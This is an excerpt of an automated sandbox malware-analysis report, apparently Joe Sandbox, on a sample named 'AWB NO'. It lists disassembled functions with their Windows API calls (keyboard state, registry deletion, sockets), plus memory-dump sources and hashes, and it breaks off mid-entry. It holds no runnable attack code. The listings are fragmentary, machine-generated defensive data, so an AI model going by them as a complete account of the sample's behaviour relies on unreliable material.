                                                              • Instruction Fuzzy Hash: E5E1A5312043419FC714EF25C491AABBBE1BF44314F14846EF8999B3A2DB39EC49CB5A
                                                              Function 00463226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 004632C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              • Opcode ID: 77fe609f7d7df2f5dc9ffe3ad1bea5ae7a1829eac4f59a579a3ff1f305724edc
                                                              • Instruction ID: bd39f8208ce013f69ee2957a59db9678c91d00ade58264490e67fb22ecbd3877
                                                              • Opcode Fuzzy Hash: 77fe609f7d7df2f5dc9ffe3ad1bea5ae7a1829eac4f59a579a3ff1f305724edc
                                                              • Instruction Fuzzy Hash: F41138313083967AA7015E55EC62DABB3ACDF19766F2000ABF40056281F67D5B1106BF
                                                              Function 0048D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • GetSystemMetrics.USER32(0000000F), ref: 0048D78A
                                                              • GetSystemMetrics.USER32(0000000F), ref: 0048D7AA
                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D9E5
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048DA03
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048DA24
                                                              • ShowWindow.USER32(00000003,00000000), ref: 0048DA43
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0048DA68
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048DA8B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                              • String ID:
                                                              • API String ID: 1211466189-0
                                                              • Opcode ID: f70638cb6bdb2bd2f28f86c149af183c7a65bc4c621125ccc619a6dbdc1ddf3f
                                                              • Instruction ID: eb940e76658434b7ad8eeabe1703afeb33935e81992f953b53c46158808d9c3e
                                                              • Opcode Fuzzy Hash: f70638cb6bdb2bd2f28f86c149af183c7a65bc4c621125ccc619a6dbdc1ddf3f
                                                              • Instruction Fuzzy Hash: C9B19B71901215EBDF18EF68C9857BE7BB1FF48700F18847AEC48AB295D738A950CB58
                                                              Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000), ref: 0043C46A
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000), ref: 0043C4D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: 5d7a265bfa4b2b0f4e892985f1cda791045749e89afcf4abe5dc01cf4c95db47
                                                              • Instruction ID: 8b6c8ed304f0763f3ef54d0254f4868818f2511668e6adff05f7a0ccbdd179e1
                                                              • Opcode Fuzzy Hash: 5d7a265bfa4b2b0f4e892985f1cda791045749e89afcf4abe5dc01cf4c95db47
                                                              • Instruction Fuzzy Hash: 7E41DC307046809ADB754B288EDC67B7B91AB95314F14883FE046B66E0CABDA846DB1D
                                                              Function 00464189 Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004641D4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004641E0
                                                              • LockResource.KERNEL32(00000000), ref: 004641ED
                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0046420D
                                                              • LoadResource.KERNEL32(?,00000000), ref: 0046421F
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0046422E
                                                              • LockResource.KERNEL32(?), ref: 0046423A
                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0046429B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLock$CreateFromIconSizeof
                                                              • String ID:
                                                              • API String ID: 2263570339-0
                                                              • Opcode ID: 617cfa106917f647481d604454f566daa8b487215408bcc40d4d77f46b5c81fb
                                                              • Instruction ID: 68d0d4707ff35a66c4c8b16f9f52eea423942b7f780b82ff2ca14d9b92ff7368
                                                              • Opcode Fuzzy Hash: 617cfa106917f647481d604454f566daa8b487215408bcc40d4d77f46b5c81fb
                                                              • Instruction Fuzzy Hash: DE31B2B160121AAFCF019F60EC58EBF7BACEF45341F10497AF801D2150E738D9618BAA
                                                              Function 00486442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 0048645A
                                                              • GetDC.USER32(00000000), ref: 00486462
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0048646D
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00486479
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004864B5
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004864C6
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00489299,?,?,000000FF,00000000,?,000000FF,?), ref: 00486500
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00486520
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: a08a4c351fe61229cc76658797f0443f2142c1b396e55029449042c7d66d5f33
                                                              • Instruction ID: 5c1cc6793609d5e6e0acb9b007d1b286434c541ad31a2caf87ecf1e2a9c9b5d4
                                                              • Opcode Fuzzy Hash: a08a4c351fe61229cc76658797f0443f2142c1b396e55029449042c7d66d5f33
                                                              • Instruction Fuzzy Hash: D4319F72201214BFEB109F50DC4AFEB3FA9EF09765F040069FE08AA295D6759C41CB68
                                                              Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09c15824ac63a65c0734988e0de1478892bca8845b386477e243a1c01ae4827c
                                                              • Instruction ID: 504086b8ac0d12f7a80c9a28070c24604f60f8592932f63d6c8978218f7d0df9
                                                              • Opcode Fuzzy Hash: 09c15824ac63a65c0734988e0de1478892bca8845b386477e243a1c01ae4827c
                                                              • Instruction Fuzzy Hash: CF718170900109EFCB04DF94CC84EBFBB74FF85314F10816AF915AA2A1C738AA11CBA9
                                                              Function 0048B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindow.USER32(0106B0C0), ref: 0048B6A5
                                                              • IsWindowEnabled.USER32(0106B0C0), ref: 0048B6B1
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B795
                                                              • SendMessageW.USER32(0106B0C0,000000B0,?,?), ref: 0048B7CC
                                                              • IsDlgButtonChecked.USER32(?,?), ref: 0048B809
                                                              • GetWindowLongW.USER32(0106B0C0,000000EC), ref: 0048B82B
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B843
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                              • String ID:
                                                              • API String ID: 4072528602-0
                                                              • Opcode ID: ff14fa38de5f0b27e4dc6a9d98642c1f41753b175040c623b2d1a44597c1e3a2
                                                              • Instruction ID: a7d0881697c90ebb8ac62a69b5506f8dd5c31139f9226510073890e22dad6404
                                                              • Opcode Fuzzy Hash: ff14fa38de5f0b27e4dc6a9d98642c1f41753b175040c623b2d1a44597c1e3a2
                                                              • Instruction Fuzzy Hash: 3A719034600304AFDB20AF64C894FAE7BB9FF49300F15486EE945A7361D739A841DB9D
                                                              Function 0046145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0046149C
                                                              • GetKeyboardState.USER32(?), ref: 004614B1
                                                              • SetKeyboardState.USER32(?), ref: 00461512
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461540
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046155F
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 004615A5
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004615C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                              • Instruction ID: 1ad2f9c427477234de6172a5734c88337e52b537abe48fa8ba5ad4ac1d5a2b9b
                                                              • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                              • Instruction Fuzzy Hash: A451F4A0A043D53EFB324634CC45BBBBEA95B46304F0C848FE1D6569E2E69CDC84D75A
                                                              Function 00461276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 004612B5
                                                              • GetKeyboardState.USER32(?), ref: 004612CA
                                                              • SetKeyboardState.USER32(?), ref: 0046132B
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00461357
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00461374
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004613B8
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004613D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                              • Instruction ID: b99961755fe5fc4aaf7fc08d4f592ff79c76eb46e067809845c5d5ed139ad427
                                                              • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                              • Instruction Fuzzy Hash: 625114A09043C53DFB3282248C41B7B7FA95B06304F0C448BE4D596AE2F798ACC8D75A
                                                              Function 00486FEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 143windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00487093
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 004870A7
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004870C1
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00487133
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00487161
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysListView32
                                                              • API String ID: 2326795674-78025650
                                                              • Opcode ID: b94ec508bdbd92bfc77db7aa8df4161c5d4b177e6850a474fd890b0e84a73c7f
                                                              • Instruction ID: 8d96cf30731f9aac7b823901c9e083a04a5181feac03be769610aafeab0db2a7
                                                              • Opcode Fuzzy Hash: b94ec508bdbd92bfc77db7aa8df4161c5d4b177e6850a474fd890b0e84a73c7f
                                                              • Instruction Fuzzy Hash: 7541B371904308AFDB21AF64CC85BEF77A8EF08354F20092BF544A7292D679DD858B68
                                                              Function 0045DA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045DAC5
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045DAFB
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045DB0C
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045DB8E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: ,,I$DllGetClassObject
                                                              • API String ID: 753597075-1683996018
                                                              • Opcode ID: bd04dc08d3ae7bfadbe53b5410b67b02ab652c227152baabf1e45b2858894097
                                                              • Instruction ID: bdd2be2ff8fd35e167879badfa90f04c80079ac5dfc6a7bed9592843198ac637
                                                              • Opcode Fuzzy Hash: bd04dc08d3ae7bfadbe53b5410b67b02ab652c227152baabf1e45b2858894097
                                                              • Instruction Fuzzy Hash: FC418271A00204EFDB25CF55C884A9A7BBAEF44311F1581AEED059F207D7B9ED48CBA4
                                                              Function 0048122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0048125C
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00481286
                                                              • FreeLibrary.KERNEL32(00000000), ref: 0048133D
                                                                • Part of subcall function 0048122D: RegCloseKey.ADVAPI32(?), ref: 004812A3
                                                                • Part of subcall function 0048122D: FreeLibrary.KERNEL32(?), ref: 004812F5
                                                                • Part of subcall function 0048122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481318
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 004812E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 59a0954294989c9cc7baee405be50d69b665d4c8366daf6602a98d2433ad7fc6
                                                              • Instruction ID: c705425fdb16329370bfebf572505c6039bd2b495d774f44f1cf002bfd069236
                                                              • Opcode Fuzzy Hash: 59a0954294989c9cc7baee405be50d69b665d4c8366daf6602a98d2433ad7fc6
                                                              • Instruction Fuzzy Hash: 4C311E71901109BFEB15AF90DC899FFB7BCEB09300F10097BE905E2251D6745E8A9BA8
                                                              Function 0048653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0048655B
                                                              • GetWindowLongW.USER32(0106B0C0,000000F0), ref: 0048658E
                                                              • GetWindowLongW.USER32(0106B0C0,000000F0), ref: 004865C3
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004865F5
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0048661F
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00486630
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0048664A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 7e8e3cbf37106a76f055c8366b844854849938a8df03b0c0084bc4c9dc5da368
                                                              • Instruction ID: 885ea9d2648f7cf39bc3bf26eacc0d8c5cfc621d480c2aaf8e3cde1e4b1c4fac
                                                              • Opcode Fuzzy Hash: 7e8e3cbf37106a76f055c8366b844854849938a8df03b0c0084bc4c9dc5da368
                                                              • Instruction Fuzzy Hash: 65313430601150AFDB60EF18EC84F6A37E1FB4A310F1A4579F5019B2B5CB35AC44DB59
                                                              Function 00476486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004780CB
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004764D9
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004764E8
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476521
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 0047652A
                                                              • WSAGetLastError.WSOCK32 ref: 00476534
                                                              • closesocket.WSOCK32(00000000), ref: 0047655D
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476576
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 910771015-0
                                                              • Opcode ID: 74c6652e652a631785c3cf5e66c26abcdfc8c244c4b2312955181242269b2fac
                                                              • Instruction ID: 88e8d7ad7378523e1ee53271d3cbf6d364baabb8775fd53d7e5544776c6eccb5
                                                              • Opcode Fuzzy Hash: 74c6652e652a631785c3cf5e66c26abcdfc8c244c4b2312955181242269b2fac
                                                              • Instruction Fuzzy Hash: 3B31D331600118AFDB10AF24DC85BFE7BA9EB44714F01803EFD09A7291CB78AD08CB69
                                                              Function 0045E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0045E0FA
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0045E120
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0045E123
                                                              • SysAllocString.OLEAUT32 ref: 0045E144
                                                              • SysFreeString.OLEAUT32 ref: 0045E14D
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0045E167
                                                              • SysAllocString.OLEAUT32(?), ref: 0045E175
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
